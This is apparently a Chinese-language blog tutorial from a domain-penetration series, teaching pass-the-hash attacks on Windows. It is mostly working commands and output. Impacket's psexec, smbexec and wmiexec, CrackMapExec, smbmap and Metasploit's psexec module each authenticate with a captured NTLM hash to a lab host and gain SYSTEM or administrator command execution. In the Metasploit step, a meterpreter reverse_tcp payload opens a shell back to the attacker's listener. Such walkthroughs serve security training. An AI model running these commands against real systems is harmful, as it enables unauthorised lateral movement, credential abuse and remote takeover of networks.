域渗透学习(一)Windows认证机制
域渗透学习(二)Kerberos协议
域渗透学习(三)域内信息搜集
域渗透学习(四)Dump Password & Hash
域渗透学习(五)基于IPC的远程连接

PTH 哈希传递攻击

在前文Windows认证机制(网络认证 Net NTLM)章节中可以了解到,在获取了目标机器用户的NTLM Hash的情况下,可无需破解哈希直接使用目标的NTLM Hash来完成身份验证

哈希提取请参考域渗透学习(四)DUMP PASSWORD & HASH

如这里获取到的NTLM Hash 4d01fbeeaf2b706478943e0889df5622

可完成Pass The Hash的工具:

注意,PTH仍然是基于IPC远程连接实现的,所以关于账户权限,与 域渗透学习(五)基于IPC的远程连接 中提到的相同

具体参考:关于IPC连接和Psexec的用户权限问题

impacket

1
pip3 install impacket
  • psexec.py
1
psexec.py -hashes :<hash> 域/域用户名@192.168.10.2

  • smbexec.py
1
smbexec.py -hashes :<hash> 域/域用户名@192.168.10.2
1
2
3
4
5
6
7
8
PS C:\Users\AresX> smbexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>
  • wmiexec.py
1
2
3
4
PS C:\Users\AresX> wmiexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201 whoami        Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] SMBv2.1 dialect used
de1ay\administrator

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec/wiki

1
pip2 install crackmapexec

截止到2020/3 官方程序尚未支持Python3

Windows安装需要额外安装Microsoft Visual C++ 14.0,建议*nix环境下安装

使用CrackMapExec实现Hash传递:

1
2
3
4
5
6
aresx@XXXXXXXXXX:~$ cme smb 192.168.10.201 -u administrator -H 4d01fbeeaf2b706478943e0889df5622 -x whoami
CME 192.168.10.201:445 PC [*] Windows 6.1 Build 7601 (name:PC) (domain:DE1AY)
CME 192.168.10.201:445 PC [+] DE1AY\administrator 4d01fbeeaf2b706478943e0889df5622 (Pwn3d!) CME smb:445 XXXXXXXXXX [*] Windows 10.0 Build 18362 (name:XXXXXXXXXX) (domain:XXXXXXXXXX)
CME 192.168.10.201:445 PC [+] Executed command
CME 192.168.10.201:445 PC de1ay\administrator
[*] KTHXBYE!

Smbmap

https://github.com/ShawnDEvans/smbmap

1
2
3
4
5
6
7
8
PS E:\Tools\内网渗透工具集\smbmap> python3 .\smbmap.py -u administrator -d de1ay -p f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 -H 192.168.10.201
[+] IP: 192.168.10.201:445 Name: PC
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE 远程管理
C$ READ, WRITE 默认共享
IPC$ NO ACCESS 远程 IPC
PS E:\Tools\内网渗透工具集\smbmap>

Smbmap需提供LM Hash:NTLM Hash

Metasploit

使用的是exploit/windows/smb/psexec

注意这里填入的哈希是LM Hash:NTLM Hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

=[ metasploit v5.0.21-dev ]
+ -- --=[ 1889 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

[*] Starting persistent handler(s)...

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf5 exploit(windows/smb/psexec) > set LPORT 7778
LPORT => 7778
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.10.201
RHOSTS => 192.168.10.201
msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.10.201 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.10.1 yes The listen address (an interface may be specified)
LPORT 7778 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBPass f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 //冒号前为LM Hash 后为NTLM Hash
SMBPass => f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622
msf5 exploit(windows/smb/psexec) > set SMBDomain de1ay
SMBDomain => de1ay
msf5 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.10.1:7778
[*] 192.168.10.201:445 - Connecting to the server...
[*] 192.168.10.201:445 - Authenticating to 192.168.10.201:445|de1ay as user 'Administrator'...
[*] 192.168.10.201:445 - Selecting PowerShell target
[*] 192.168.10.201:445 - Executing the payload...
[+] 192.168.10.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.10.201
[*] Meterpreter session 1 opened (192.168.10.1:7778 -> 192.168.10.201:49482) at 2020-03-10 13:54:44 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
⬆︎TOP